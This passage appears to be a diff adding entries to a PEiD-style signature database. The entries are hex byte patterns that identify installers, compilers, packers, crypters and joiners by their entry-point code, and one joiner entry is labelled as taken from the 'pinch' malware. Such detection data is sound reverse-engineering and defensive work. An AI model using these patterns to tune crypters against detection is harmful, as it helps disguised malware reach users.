+[INCrypter 0.3 (INinY) - by z3e_NiFe]
+signature = 60 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8D 58 20 C7 03 00 00 00 00 E8 00 00 00 00 5D 81 ED 4D 16 40 00 8B 9D 0E 17 40 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 83 F8 01 75 05 03 DB C1 CB 10 8B 8D 12 17 40 00 8B B5 06 17 40 00 51 81 3E 2E 72 73 72 74 65 8B 85 16 17 40 00 E8 23 00 00 00 8B 85 1A 17 40 00 E8 18 00 00 00 8B 85 1E 17 40 00 E8 0D 00 00 00 8B 85 22 17 40 00 E8 02 00 00 00 EB 18 8B D6 3B 46 0C 72 0A 83 F9 01 74 0B 3B 46 34 72 06 BA 00 00 00 00 C3 58 83 FA 00 75 1A 8B 4E 10 8B 7E 0C 03 BD 02 17 40 00 83 F9 00 74 09 F6 17 31 0F 31 1F 47 E2 F7 59 83 C6 28 49 83 F9 00 75 88 8B 85 0A 17 40 00 89 44 24 1C 61 50 C3
+ep_only = false
+
+[Inno Setup Module]
+signature = 49 6E 6E 6F 53 65 74 75 70 4C 64 72 57 69 6E 64 6F 77 00 00 53 54 41 54 49 43
+ep_only = true
+
+[Inno Setup Module]
+signature = 55 8B EC 83 C4 ?? 53 56 57 33 C0 89 45 F0 89 45 ?? 89 45 ?? E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF
+ep_only = false
+
+[Inno Setup Module v1.09a]
+signature = 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 C4 89 45 C0 E8 A7 7F FF FF E8 FA 92 FF FF E8 F1 B3 FF FF 33 C0
+ep_only = true
+
+[Inno Setup Module v1.2.9]
+signature = 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 EC 89 45 C0 E8 5B 73 FF FF E8 D6 87 FF FF E8 C5 A9 FF FF E8 E0
+ep_only = true
+
+[Inno Setup Module v2.0.18]
+signature = 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 73 71 FF FF E8 DA 85 FF FF E8 81 A7 FF FF E8 C8
+ep_only = false
+
+[Inno Setup Module v3.0.4-beta/v3.0.6/v3.0.7]
+signature = 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 B3 70 FF FF E8 1A 85 FF FF E8 25 A7 FF FF E8 6C
+ep_only = false
+
+[Install Stub 32-bit]
+signature = 55 8B EC 81 EC 14 ?? 00 00 53 56 57 6A 00 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 29
+ep_only = true
+
+[InstallAnywhere 6.1 -> Zero G Software Inc]
+signature = 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0
+ep_only = true
+
+[InstallAnywhere 6.1 ->Zero G Software Inc]
+signature = 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07
+ep_only = true
+
+[InstallShield 2000]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 C4 ?? 53 56 57
+ep_only = true
+
+[InstallShield Custom]
+signature = 55 8B EC 83 EC 44 56 FF 15 ?? ?? 41 00 8B F0 85 F6 75 08 6A FF FF 15 ?? ?? 41 00 8A 06 57 8B 3D ?? ?? 41 00 3C 22 75 1B 56 FF D7 8B F0 8A 06 3C 22 74 04 84 C0 75 F1 80 3E 22 75 15 56 FF D7 8B
+ep_only = true
+
+[Ionic Wind Software]
+signature = 9B DB E3 9B DB E2 D9 2D 00 ?? ?? 00 55 89 E5 E8
+ep_only = true
+
+[iPB Protect 0.1.3 - 0.1.7 -> forgot]
+signature = 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00
+ep_only = true
+
+[iPBProtect v0.1.3]
+signature = 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 FA 33 DB 89 5D F8 6A 02 EB 01 F8 58 5F 5E 5B 64 8B 25 00 00 00 00 64 8F 05 00 00 00 00 58 58 58 5D 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78
+ep_only = false
+
+[IProtect 1.0 (Fxlib.dll mode) - by FuXdas]
+signature = EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 4C 69 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED 71 10 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 63 10 40 00 8D 85 3C 10 40 00 50 FF B5 63 10 40 00 E8 92 00 00 00 0B C0 74 13 89 85 5F 10 40 00 8D 85 49 10 40 00 50 FF 95 5F 10 40 00 8B 85 67 10 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 FA FD FF FF
+ep_only = true
+
+[IProtect 1.0 (FxSub.dll mode) - by FuXdas]
+signature = EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 53 75 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED B6 13 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 A8 13 40 00 8D 85 81 13 40 00 50 FF B5 A8 13 40 00 E8 92 00 00 00 0B C0 74 13 89 85 A4 13 40 00 8D 85 8E 13 40 00 50 FF 95 A4 13 40 00 8B 85 AC 13 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 B5 FA FF FF
+ep_only = true
+
+[JAM v2.11]
+signature = 50 06 16 07 BE ?? ?? 8B FE B9 ?? ?? FD FA F3 2E A5 FB 06 BD ?? ?? 55 CB
+ep_only = true
+
+[JDPack]
+signature = 60 E8 ?? ?? ?? ?? 5D 8B D5 81 ED ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 81 EA 06 ?? ?? ?? 89 95 ?? ?? ?? ?? 83 BD 45
+ep_only = true
+
+[JDPack 2.x -> JDPack]
+signature = 55 8B EC 6A FF 68 68 51 40 00 68 04 25 40 00 64 A1 00 00 00 00
+ep_only = true
+
+[JDPack V2.00 -> JDPack]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 ?? ?? ?? E8 01 00 00 00 ?? ?? ?? ?? ?? ?? 05 00 00 00 00 83 C4 0C 5D 60 E8 00 00 00 00 5D 8B D5 64 FF 35 00 00 00 00 EB
+ep_only = true
+
+[JExeCompressor 1.0 - by Arash Veyskarami]
+signature = 8D 2D D3 4A E5 14 0F BB F7 0F BA E5 73 0F AF D5 8D 0D 0C 9F E6 11 C0 F8 EF F6 DE 80 DC 5B F6 DA 0F A5 C1 0F C1 F1 1C F3 4A 81 E1 8C 1F 66 91 0F BE C6 11 EE 0F C0 E7 33 D9 64 F2 C0 DC 73 0F C0 D5 55 8B EC BA C0 1F 41 00 8B C2 B9 97 00 00 00 80 32 79 50 B8 02 00 00 00 50 03 14 24 58 58 51 2B C9 B9 01 00 00 00 83 EA 01 E2 FB 59 E2 E1 FF E0
+ep_only = true
+
+[Joiner (sign from pinch 25.03.2007 20:10)]
+signature = 81 EC 04 01 00 00 8B F4 68 04 01 00 00 56 6A 00 E8 7C 01 00 00 33 C0 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 56 E8 50 01 00 00 8B D8 6A 00 6A 00 6A 00 6A 02 6A 00 53 E8 44 01
+ep_only = true
+
+[KBys Packer 0.28 Beta -> Shoooo]
+signature = 60 E8 00 00 00 00 5E 83 EE 0A 8B 06 03 C2 8B 08 89 4E F3 83 EE 0F 56 52 8B F0 AD AD 03 C2 8B D8 6A 04 BF 00 10 00 00 57 57 6A 00 FF 53 08 5A 59 BD 00 80 00 00 55 6A 00 50 51 52 50 89 06 AD AD 03 C2 50 AD 03 C2 FF D0 6A 04 57 AD 50 6A 00 FF 53
+ep_only = false
+
+[KByS V0.22 -> shoooo]
+signature = 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 11 55 07 8B EC B8 ?? ?? ?? ?? E8
+ep_only = true
+
+[KByS V0.28 -> shoooo]
+signature = 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4
+ep_only = true
+
+[KByS V0.28 DLL -> shoooo]
+signature = B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C2 FF E0 ?? ?? ?? ?? 60 E8 00 00 00 00
+ep_only = true
+
+[KGB SFX]
+signature = 60 BE 00 A0 46 00 8D BE 00 70 F9 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73
+ep_only = true
+
+[KGCrypt vx.x]
+signature = E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 64 A1 30 ?? ?? ?? 84 C0 74 ?? 64 A1 20 ?? ?? ?? 0B C0 74
+ep_only = true
+
+[kkrunchy -> Ryd]
+signature = BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10
+ep_only = true
+
+[kkrunchy 0.23 alpha -> Ryd]
+signature = BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10 8D 9D A0 08 00 00 E8 ?? 00 00 00 8B 45 10 EB 42 8D 9D A0 04 00 00 E8 ?? 00 00 00 49 49 78 40 8D 5D 20 74 03 83 C3 40 31 D2 42 E8 ?? 00 00 00 8D 0C 48 F6 C2 10 74 F3 41 91 8D 9D A0 08 00 00 E8 ?? 00 00 00 3D 00 08 00 00 83 D9 FF 83 F8 60 83 D9 FF 89 45 10 56 89 FE 29 C6 F3 A4 5E EB 90 BE ?? ?? ?? 00 BB ?? ?? ?? 00 55 46 AD 85 C0 74 ?? 97 56 FF 13 85 C0 74 16 95 AC 84 C0 75 FB 38 06 74 E8 78 ?? 56 55 FF 53 04 AB 85 C0
+ep_only = true
+
+[kkrunchy 0.23 alpha 2 -> Ryd]
+signature = BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF
+ep_only = true
+
+[kkrunchy 0.23 alpha 2 -> Ryd]
+signature = BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF ?? ?? ?? 01 31 C9 41 8D 74 09 01 B8 CA 8E 2A 2E 99 F7 F6 01 C3 89 D8 C1 E8 15 AB FE C1 75 E8 BE
+ep_only = true
+
+[kkrunchy v0.17 -> F. Giesen]
+signature = FC FF 4D 08 31 D2 8D 7D 30 BE
+ep_only = false
+
+[kkrunchy V0.2X -> Ryd]
+signature = BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? ?? 57 BE ?? ?? ?? ?? 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6
+ep_only = true
+
+[Krypton v0.2]
+signature = 8B 0C 24 E9 0A 7C 01 ?? AD 42 40 BD BE 9D 7A 04
+ep_only = true
+
+[Krypton v0.3]
+signature = 8B 0C 24 E9 C0 8D 01 ?? C1 3A 6E CA 5D 7E 79 6D B3 64 5A 71 EA
+ep_only = true
+
+[Krypton v0.4]
+signature = 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 61 34 ?? ?? 2B 85 60 37 ?? ?? 83 E8 06
+ep_only = true
+
+[Krypton v0.5]
+signature = 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 71 44 ?? ?? 2B 85 64 60 ?? ?? EB 43 DF
+ep_only = true
+
+[kryptor 5]
+signature = E8 03 ?? ?? ?? E9 EB 6C 58 40 FF E0
+ep_only = true
+
+[kryptor 6]
+signature = E8 03 ?? ?? ?? E9 EB 68 58 33 D2 74 02 E9 E9 40 42 75 02
+ep_only = true
+
+[kryptor 9]
+signature = 60 E8 ?? ?? ?? ?? 5E B9 ?? ?? ?? ?? 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9
+ep_only = true
+
+[LameCrypt -> LaZaRus]
+signature = 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8 ?? ?? 40 00 FF E0
+ep_only = true
+
+[LameCrypt v1.0]
+signature = 60 66 9C BB ?? ?? ?? ?? 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61
+ep_only = true
+
+[LamerStop v1.0c (c) Stefan Esser]
+signature = E8 ?? ?? 05 ?? ?? CD 21 33 C0 8E C0 26 ?? ?? ?? 2E ?? ?? ?? 26 ?? ?? ?? 2E ?? ?? ?? BA ?? ?? FA
+ep_only = true
+
+[LaunchAnywhere v4.0.0.1]
+signature = 55 89 E5 53 83 EC 48 55 B8 FF FF FF FF 50 50 68 E0 3E 42 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 C0 69 44 00 E8 E4 80 FF FF 59 E8 4E 29 00 00 E8 C9 0D 00 00 85 C0 75 08 6A FF E8 6E 2B 00 00 59 E8 A8 2C 00 00 E8 23 2E 00 00 FF 15 4C C2 44 00 89 C3
+ep_only = true
+
+[Launcher Generator v1.03]
+signature = 68 00 20 40 00 68 10 20 40 00 6A 00 6A 00 6A 20 6A 00 6A 00 6A 00 68 F0 22 40 00 6A 00 E8 93 00 00 00 85 C0 0F 84 7E 00 00 00 B8 00 00 00 00 3B 05 68 20 40 00 74 13 6A ?? 68 60 23 40 00 68 20 23 40 00 6A 00 E8 83 00 00 00 A1 58 20 40 00 3B 05 6C 20 40 00
+ep_only = false
+
+[LOCK98 V1.00.28 -> keenvim]
+signature = 55 E8 00 00 00 00 5D 81 ?? ?? ?? ?? ?? EB 05 E9 ?? ?? ?? ?? EB 08
+ep_only = true
+
+[Lockless Intro Pack]
+signature = 2C E8 ?? ?? ?? ?? 5D 8B C5 81 ED F6 73 ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 06 89 85
+ep_only = true
+
+[LTC v1.3]
+signature = 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06
+ep_only = true
+
+[LY_WGKX -> www.szleyu.com]
+signature = 4D 79 46 75 6E 00 62 73
+ep_only = false
+
+[Macromedia Windows Flash Projector/Player v3.0]
+signature = 55 8B EC 83 EC 44 56 FF 15 94 13 42 00 8B F0 B1 22 8A 06 3A C1 75 13 8A 46 01 46 3A C1 74 04 84 C0 75 F4 38 0E 75 0D 46 EB 0A 3C 20 7E 06
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v4.0]
+signature = 83 EC 44 56 FF 15 24 41 43 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v5.0]
+signature = 83 EC 44 56 FF 15 70 61 44 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C 3C 20 7E 08 8A 46 01 46 3C 20 7F F8 8A 06 84 C0 74 0C 3C 20 7F 08 8A 46 01 46 84 C0 75 F4 8D 44 24 04 C7 44 24 30 00
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v6.0]
+signature = 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C
+ep_only = true
+
+[MarjinZ EXE-Scrambler SE - by MarjinZ]
+signature = E8 A3 02 00 00 E9 35 FD FF FF FF 25 C8 20 00 10 6A 14 68 C0 21 00 10 E8 E4 01 00 00 FF 35 7C 33 00 10 8B 35 8C 20 00 10 FF D6 59 89 45 E4 83 F8 FF 75 0C FF 75 08 FF 15 88 20 00 10 59 EB 61 6A 08 E8 02 03 00 00 59 83 65 FC 00 FF 35 7C 33 00 10 FF D6 89 45 E4 FF 35 78 33 00 10 FF D6 89 45 E0 8D 45 E0 50 8D 45 E4 50 FF 75 08 E8 D1 02 00 00 89 45 DC FF 75 E4 8B 35 74 20 00 10 FF D6 A3 7C 33 00 10 FF 75 E0 FF D6 83 C4 1C A3 78 33 00 10 C7 45 FC FE FF FF FF E8 09 00 00 00 8B 45 DC E8 A0 01 00 00 C3
+ep_only = false
+
+[MaskPE 1.6 -> yzkzero]
+signature = 36 81 2C 24 ?? ?? ?? 00 C3 60
+ep_only = false
+
+[MaskPE V2.0 -> yzkzero]
+signature = B8 18 00 00 00 64 8B 18 83 C3 30 C3 40 3E 0F B6 00 C1 E0 ?? 83 C0 ?? 36 01 04 24 C3
+ep_only = false
+
+[MASM32]
+signature = 6A ?? 68 00 30 40 00 68 ?? 30 40 00 6A 00 E8 07 00 00 00 6A 00 E8 06 00 00 00 FF 25 08 20
+ep_only = true
+
+[Matrix Dongle -> TDi GmbH]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 E8 B6 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? E8 00 00 00 00 5B 2B D9 8B F8 8B 4C 24 2C 33 C0 2B CF F2 AA 8B 3C 24 8B 0A 2B CF 89 5C 24 20 80 37 A2 47 49 75 F9 8D 64 24 04 FF 64 24 FC 60 C7 42 08 ?? ?? ?? ?? E8 C5 FF FF FF C3 C2 F7 29 4E 29 5A 29 E6 86 8A 89 63 5C A2 65 E2 A3 A2
+ep_only = false
+
+[Matrix Dongle -> TDi GmbH]
+signature = E8 00 00 00 00 E8 00 00 00 00 59 5A 2B CA 2B D1 E8 1A FF FF FF
+ep_only = true
+
+[MEGALITE v1.20a]
+signature = B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 2D 73 ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 90
+ep_only = true
+
+[MESS v1.20]
+signature = ?? ?? ?? ?? FA B9 ?? ?? F3 ?? ?? E3 ?? EB ?? EB ?? B6
+ep_only = true
+
+[Metrowerks CodeWarrior (DLL) v2.0]
+signature = 55 89 E5 53 56 57 8B 75 0C 8B 5D 10 83 FE 01 74 05 83 FE 02 75 12 53 56 FF 75 08 E8 6E FF FF FF 09 C0 75 04 31 C0 EB 21 53 56 FF 75 08 E8 ?? ?? ?? ?? 89 C7 09 F6 74 05 83 FE 03 75 0A 53 56 FF 75 08 E8 47 FF FF FF 89 F8 8D 65 F4 5F 5E 5B 5D C2 0C 00 C9
+ep_only = false
+
+[Metrowerks CodeWarrior v2.0 (Console)]
+signature = 55 89 E5 55 B8 FF FF FF FF 50 50 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8
+ep_only = false
+
+[Metrowerks CodeWarrior v2.0 (GUI)]
+signature = 55 89 E5 53 56 83 EC 44 55 B8 FF FF FF FF 50 50 68 ?? ?? 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8
+ep_only = false
+
+[MEW 10 by Northfox]
+signature = 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40
+ep_only = false
+
+[Mew 10 exe-coder 1.0 -> Northfox [HCC]]
+signature = 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70
+ep_only = true
+
+[MEW 11 SE v1.1]
+signature = E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[MEW 11 SE v1.2]
+signature = E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[Mew 11 SE v1.2 (Eng) -> Northfox]
+signature = E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C
+ep_only = true
+
+[MEW 11 SE v1.2 -> Northfox[HCC]]
+signature = E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? ?? 00
+ep_only = true
+
+[MEW 5 1.0 -> Northfox]
+signature = BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0
+ep_only = true
+
+[Mew 5.0.1 -> NorthFox / HCC]
+signature = BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D
+ep_only = true
+
+[MicroJoiner 1.1 -> coban2k]
+signature = BE 0C 70 40 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11
+ep_only = true
+
+[MicroJoiner 1.5 -> coban2k]
+signature = BF 05 10 40 00 83 EC 30 8B EC E8 C8 FF FF FF E8 C3 FF FF FF
+ep_only = true
+
+[MicroJoiner 1.6 -> coban2k]
+signature = 33 C0 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B
+ep_only = true
+
+[MicroJoiner 1.7 -> coban2k]
+signature = BF 00 10 40 00 8D 5F 21 6A 0A 58 6A 04 59 60 57 E8 8E 00 00 00
+ep_only = true
+
+[Microsoft Visual C++ V8.0]
+signature = 6A 14 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB 94 00 00 00 53 6A 00 8B ?? ?? ?? ?? ?? FF D7 50 FF ?? ?? ?? ?? ?? 8B F0 85 F6 75 0A 6A 12 E8 ?? ?? ?? ?? 59 EB 18 89 1E 56 FF ?? ?? ?? ?? ?? 56 85 C0 75 14 50 FF D7 50 FF ?? ?? ?? ?? ?? B8
+ep_only = true
+
+[Microsoft Visual C++ V8.0 (Debug)]
+signature = E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9
+ep_only = true
+
+[MinGW GCC 3.x]
+signature = 55 89 E5 83 EC 08 C7 04 24 ?? 00 00 00 FF 15 ?? ?? ?? ?? E8 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? 55
+ep_only = true
+
+[Minke 1.0.1 - by Codius]
